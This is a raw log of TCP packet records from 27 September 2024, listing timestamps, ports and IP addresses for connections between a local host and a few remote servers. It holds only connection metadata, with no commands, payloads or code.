Sep 27, 2024 01:38:23.088295937 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.088330030 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.088457108 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.088510990 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.090604067 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.090631008 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.090645075 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.090668917 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.090682983 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.090686083 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.090791941 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.090815067 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.090821981 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.090854883 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.091038942 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.091056108 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.091073036 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.091088057 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.091103077 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.091109037 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.091126919 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.091140032 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.091171980 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.091272116 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.091285944 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.091300964 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.091311932 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.091357946 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.091358900 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.091375113 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.091403961 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.091419935 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.091418982 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.091465950 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.176084995 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.176157951 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.176212072 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.176244020 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.176279068 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.176282883 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.176311970 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.176312923 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.176348925 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.176386118 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.176410913 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.176420927 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.176438093 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.176455021 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.176491976 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.176513910 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.177129984 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.177181005 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.177216053 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.177231073 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.177249908 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.177284002 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.177300930 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.177320004 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.177326918 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.177356005 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.177412987 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.177428007 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.177448034 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.177480936 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.177512884 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.177536964 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.177562952 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.177567005 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.177598000 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.177630901 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.177648067 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.177664995 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.177697897 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.177719116 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.177737951 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.177788973 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.177808046 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.178122997 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.178195000 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.178231955 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.178231955 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.178267002 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.178299904 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.178318024 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.178476095 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.180643082 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.180670023 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.180684090 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.180716991 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.180726051 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.180752039 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.180768967 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.180783033 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.180798054 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.180818081 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.180824995 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.180824995 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.180834055 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.180850983 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.180851936 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.180879116 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.180943012 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.180959940 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.180980921 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.180994034 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.181008101 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.181032896 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.181039095 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.181051016 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.181066036 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.181093931 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.181101084 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.181116104 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.181124926 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.181138992 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.181178093 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.201149940 CEST	443	49749	104.21.77.130	192.168.2.7
Sep 27, 2024 01:38:23.201253891 CEST	443	49749	104.21.77.130	192.168.2.7
Sep 27, 2024 01:38:23.201298952 CEST	49749	443	192.168.2.7	104.21.77.130
Sep 27, 2024 01:38:23.202135086 CEST	49749	443	192.168.2.7	104.21.77.130
Sep 27, 2024 01:38:23.202147961 CEST	443	49749	104.21.77.130	192.168.2.7
Sep 27, 2024 01:38:23.202158928 CEST	49749	443	192.168.2.7	104.21.77.130
Sep 27, 2024 01:38:23.202166080 CEST	443	49749	104.21.77.130	192.168.2.7
Sep 27, 2024 01:38:23.216145039 CEST	49750	443	192.168.2.7	104.102.49.254
Sep 27, 2024 01:38:23.216166973 CEST	443	49750	104.102.49.254	192.168.2.7
Sep 27, 2024 01:38:23.216748953 CEST	49750	443	192.168.2.7	104.102.49.254
Sep 27, 2024 01:38:23.217112064 CEST	49750	443	192.168.2.7	104.102.49.254
Sep 27, 2024 01:38:23.217124939 CEST	443	49750	104.102.49.254	192.168.2.7
Sep 27, 2024 01:38:23.236082077 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.265733957 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.265769005 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.265804052 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.265827894 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.265836954 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.266129017 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.266189098 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.266221046 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.266254902 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.266288996 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.266299963 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.266321898 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.266336918 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.266365051 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.266398907 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.266417980 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.266993046 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.267045975 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.267045975 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.267080069 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.267128944 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.267153978 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.267162085 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.267194986 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.267218113 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.267231941 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.267281055 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.267302036 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.267330885 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.267364979 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.267379045 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.267416000 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.267448902 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.267456055 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.267481089 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.267513990 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.267534018 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.267546892 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.267580032 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.267628908 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.267628908 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.267730951 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.267779112 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.267780066 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.267811060 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.267822981 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.267844915 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.267891884 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.268112898 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.268162012 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.268196106 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.268230915 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.268239021 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.268264055 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.268318892 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.270824909 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.270868063 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.270881891 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.270905972 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.270915031 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.270920992 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.270921946 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.270937920 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.270953894 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.270965099 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.270991087 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.271034002 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.271049976 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.271064997 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.271089077 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.271117926 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.271133900 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.271147966 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.271169901 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.271204948 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.271214008 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.271229982 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.271245003 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.271259069 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.271284103 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.271310091 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.356093884 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.356157064 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.356220007 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.356257915 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.356329918 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.356380939 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.356386900 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.356441021 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.356475115 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.356491089 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.356513977 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.356548071 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.356580019 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.356596947 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.356615067 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.356664896 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.357317924 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.357367992 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.357400894 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.357403994 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.357434988 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.357481003 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.357482910 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.357517004 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.357561111 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.357566118 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.357599974 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.357631922 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.357646942 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.357666016 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.357707977 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.357714891 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.357748032 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.357780933 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.357800961 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.357810974 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.357820988 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.357865095 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.357901096 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.357913971 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.357994080 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.358045101 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.358045101 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.358078957 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.358128071 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.358158112 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.358160019 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.358195066 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.358226061 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.358231068 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.358267069 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.358285904 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.358295918 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.358334064 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.358345985 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.358407974 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.358457088 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.361119032 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.361162901 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.361179113 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.361217022 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.361241102 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.361243010 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.361258030 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.361263990 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.361274958 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.361294985 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.361308098 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.361320019 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.361341953 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.361361980 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.361380100 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.361402988 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.361412048 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.361428976 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.361444950 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.361473083 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.361493111 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.361504078 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.361521006 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.361558914 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.361562014 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.361576080 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.361591101 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.361617088 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.407948971 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.446191072 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.446346045 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.446417093 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.446424007 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.446453094 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.446486950 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.446504116 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.446537018 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.446571112 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.446594000 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.446604967 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.446638107 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.446687937 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.446688890 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.446717978 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.446768045 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.447000980 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.447052956 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.447298050 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.447328091 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.447374105 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.447379112 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.447432995 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.447465897 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.447485924 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.447515965 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.447547913 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.447567940 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.447581053 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.447613955 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.447645903 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.447659016 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.447679043 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.447710991 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.447721958 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:23.447745085 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:23.447778940 CEST	80	49743	147.45.44.104	192.168.2.7
